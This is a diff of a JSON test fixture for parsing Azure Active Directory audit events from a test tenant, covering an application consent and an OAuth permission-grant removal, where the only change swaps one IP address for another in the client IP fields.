"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mo
zilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, 
ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -8486,9 +8486,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:06", "ExtendedProperties": [ { 
@@ -8723,7 +8723,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"addi
tionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] 
=\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mo
zilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, 
ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -8753,9 +8753,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:06", "ExtendedProperties": [ { 
@@ -9230,7 +9230,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\